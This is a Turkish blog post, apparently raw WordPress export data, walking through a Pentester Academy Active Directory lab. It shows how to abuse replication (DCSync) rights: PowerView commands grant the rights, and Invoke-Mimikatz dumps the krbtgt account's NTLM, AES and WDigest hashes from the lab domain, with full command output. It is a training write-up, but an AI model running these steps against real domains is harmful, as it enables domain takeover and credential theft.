Uzun bir aradan sonra MERHABA! Pentester Academy AD Lab\u0131na devam ediyorum. Asl\u0131nda lab'\u0131 bitirdim ancak s\u00fcrem 28 Ocak'ta sonlanacak, bundan dolay\u0131 elimden geldi\u011fince tekrar etmeye \u00e7al\u0131\u015f\u0131yorum. Bu yaz\u0131 i\u00e7erisinde Replication \u0130znini nas\u0131l k\u00f6t\u00fcye kullanabiliriz bunu g\u00f6rece\u011fiz. Hadi ba\u015flayal\u0131m!<\/p>\n
Bir senaryo \u00fczerinden gidece\u011fimizden dlay\u0131 ilk olarak ilgili zafiyeti olu\u015fturmam\u0131z gerekmektedir. Bunun i\u00e7in DC \u00fczerinde a\u015fa\u011f\u0131daki i\u015flemi yapmal\u0131y\u0131z.<\/p>\n
PS C:\\Windows\\system32> Invoke-Command -FilePath C:\\AD\\PowerView.ps1 -Session $sess2\nPS C:\\Windows\\system32> Enter-PSSession -Session $sess2<\/code><\/pre>\nDC \u00fczerinde Add-ObjectAcl<\/code> fonksiyonu ile bir i\u015flem ger\u00e7ekle\u015ftirece\u011fiz bunun i\u00e7in bunu Invoke-Command<\/code> ile DC'ye g\u00f6ndermemiz gerekmektedir. \u015eimdi lab ortam\u0131m\u0131z\u0131 olu\u015fturacak i\u015flemi yapal\u0131m.<\/p>\n[dcorp-dc]: PS C:\\Users\\svcadmin\\Documents> Add-ObjectAcl -TargetDistinguishedName \"dc=dollarcorp,dc=moneycorp,dc=local\" -Pri\nncipalSamAccountName student130 -Rights DCSync -Verbose\nVERBOSE: Get-DomainSearcher search string: LDAP:\/\/DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Get-DomainSearcher search string: LDAP:\/\/DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 'DCSync' on DC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' rights on\nDC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' rights on\nDC=dollarcorp,DC=moneycorp,DC=local\nVERBOSE: Granting principal S-1-5-21-1874506631-3219952063-538504511-45149 '89e95b76-444d-4c62-991a-0facbeda640c' rights on\nDC=dollarcorp,DC=moneycorp,DC=local<\/code><\/pre>\nstudent130 kullan\u0131c\u0131s\u0131 i\u00e7in DCSync haklar\u0131n\u0131 tamamlad\u0131k. Ve art\u0131k bunu istismar edebiliriz.<\/p>\n
Sald\u0131r<\/h1>\n
Sahip oldu\u011fumuz kullan\u0131c\u0131 ile ilgili ilk olarak haklar\u0131n\u0131 kontrol edecek bir i\u015flem ger\u00e7ekle\u015ftirelim.<\/p>\n
PS C:\\Users\\student130> $acls = Invoke-ACLScanner -ResolveGUIDs | select *\nPS C:\\Users\\student130> $acls | Where-Object {$_.IdentityReferenceName -match \"student130\" -and $_.ObjectDN -eq \"DC=dollarcorp,DC=moneycorp,DC=local\" } | select ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\n\nObjectDN ActiveDirectoryRights ObjectAceType IdentityReferenceName\n-------- --------------------- ------------- ---------------------\nDC=dollarcorp,DC=moneycorp,DC=local ExtendedRight DS-Replication-Get-Changes-In-Filtered-Set student130\nDC=dollarcorp,DC=moneycorp,DC=local ExtendedRight DS-Replication-Get-Changes student130\nDC=dollarcorp,DC=moneycorp,DC=local ExtendedRight DS-Replication-Get-Changes-All student130\n<\/code><\/pre>\nReplication haklar\u0131 DC \u00fczerinde Users and Computers alan\u0131nda domain k\u0131sm\u0131na geldi\u011finizde proporty k\u0131sm\u0131ndan g\u00f6r\u00fclebildi\u011finden dolay\u0131 kod taraf\u0131nda $_.ObjectDN alan\u0131 \"DC=dollarcorp,DC=moneycorp,DC=local\" \u015feklinde ta\u0131mlan\u0131\u015ft\u0131r.<\/p>\n
\u015eimdi sadece bir g\u00f6rmenizi istedi\u011fimden dolay\u0131. Lab ortam\u0131n\u0131 kurarken ki haklar\u0131 silip yukar\u0131daki komutu tekrar \u00e7al\u0131\u015ft\u0131raca\u011f\u0131m.<\/p>\n
PS C:\\Users\\student130> $acls = Invoke-ACLScanner -ResolveGUIDs | select *\nPS C:\\Users\\student130>\nPS C:\\Users\\student130> $acls | Where-Object {$_.IdentityReferenceName -match \"student130\" -and $_.ObjectDN -eq \"DC=dollarcorp,DC=moneycorp,DC=local\" } | select ObjectDN, ActiveDirectoryRights, ObjectAceType, IdentityReferenceName\nPS C:\\Users\\student130>\n<\/code><\/pre>\nG\u00f6r\u00fcld\u00fc\u011f\u00fc \u00fczere hi\u00e7 bir sonu\u00e7 gelmemektedir. Neyse bunu \u015fimdi bir kenara b\u0131rak\u0131yorum sadece g\u00f6stermek istemi\u015ftim. Lab\u0131m\u0131za geri d\u00f6nelim. replication haklar\u0131m\u0131z\u0131n oldu\u011funu g\u00f6rd\u00fck. Bunu g\u00f6ren sald\u0131rgan hemen krbtgt hesab\u0131n\u0131n ntlm hash'ini elde etmek isteyecektir!<\/p>\n
PS C:\\Users\\student130> Invoke-Mimikatz -Command '\"lsadump::dcsync \/user:dcorp\\krbtgt\"'\n\n .#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56\n .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo) ** Kitten Edition **\n ## \/ \\ ## \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ## > http:\/\/blog.gentilkiwi.com\/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com ***\/\n\nmimikatz(powershell) # lsadump::dcsync \/user:dcorp\\krbtgt\n[DC] 'dollarcorp.moneycorp.local' will be the domain\n[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server\n[DC] 'dcorp\\krbtgt' will be the user account\n\nObject RDN : krbtgt\n\n** SAM ACCOUNT **\n\nSAM Username : krbtgt\nAccount Type : 30000000 ( USER_OBJECT )\nUser Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )\nAccount expiration :\nPassword last change : 2\/16\/2019 11:01:46 PM\nObject Security ID : S-1-5-21-1874506631-3219952063-538504511-502\nObject Relative ID : 502\n\nCredentials:\n Hash NTLM: ff46a9d8bd66c6efd77603da26796f35\n ntlm- 0: ff46a9d8bd66c6efd77603da26796f35\n lm - 0: b14d886cf45e2efb5170d4d9c4085aa2\n\nSupplemental Credentials:\n* Primary:NTLM-Strong-NTOWF *\n Random Value : 6cb7f438bf5c099fe4d029ebb5c6e08e\n\n* Primary:Kerberos-Newer-Keys *\n Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt\n Default Iterations : 4096\n Credentials\n aes256_hmac (4096) : e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a\n aes128_hmac (4096) : 4cffc651ba557c963b71b49d1add2e6b\n des_cbc_md5 (4096) : bf5d7319947f54c7\n\n* Primary:Kerberos *\n Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt\n Credentials\n des_cbc_md5 : bf5d7319947f54c7\n\n* Packages *\n NTLM-Strong-NTOWF\n\n* Primary:WDigest *\n 01 7b766fa41d1e30157b6c0113528e63ea\n 02 1bda631fac0fdec6cedfecbc7a99e30d\n 03 d7be969eaa4b841a9914e2a5eff571f7\n 04 7b766fa41d1e30157b6c0113528e63ea\n 05 1bda631fac0fdec6cedfecbc7a99e30d\n 06 8835f5f828c434a2fe077eb224e25943\n 07 7b766fa41d1e30157b6c0113528e63ea\n 08 8fdecaac2296648db5620a13723f60b5\n 09 8fdecaac2296648db5620a13723f60b5\n 10 aace962cfe8ebce04c9ed249e98369d3\n 11 6424d51e82fdc5e6a2f0559032cbead2\n 12 8fdecaac2296648db5620a13723f60b5\n 13 76e039370f352eaaff05fd2f6f8239d6\n 14 6424d51e82fdc5e6a2f0559032cbead2\n 15 acc424fd2c2c10d7e46950ad93e065c6\n 16 acc424fd2c2c10d7e46950ad93e065c6\n 17 734df139b9ceac875a011e24df53d335\n 18 e399f39adefad64659a67171b4399221\n 19 80cfc6a03006436b02bf3d27e8374444\n 20 04a4819688c0185368738acd7a8e12c4\n 21 4c60210b91d6e0fddc8a54f16337b218\n 22 4c60210b91d6e0fddc8a54f16337b218\n 23 ca7e51aef08dffca06881110ea03bf1d\n 24 36b3cac402a4005af573f1105ed14b3a\n 25 36b3cac402a4005af573f1105ed14b3a\n 26 b35c755b303bec7b4b7091a2f96d789f\n 27 58300e76fcc0c2c854c8cda6363470e2\n 28 2f6cbfe287e89f7f4829f443854857fd\n 29 610788375bd98bebd50561d66fcf8f74\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"Uzun bir aradan sonra MERHABA! Pentester Academy AD Lab\u0131na devam ediyorum. Asl\u0131nda lab’\u0131 bitirdim ancak s\u00fcrem 28 Ocak’ta sonlanacak, bundan dolay\u0131 elimden geldi\u011fince tekrar etmeye…<\/p>\n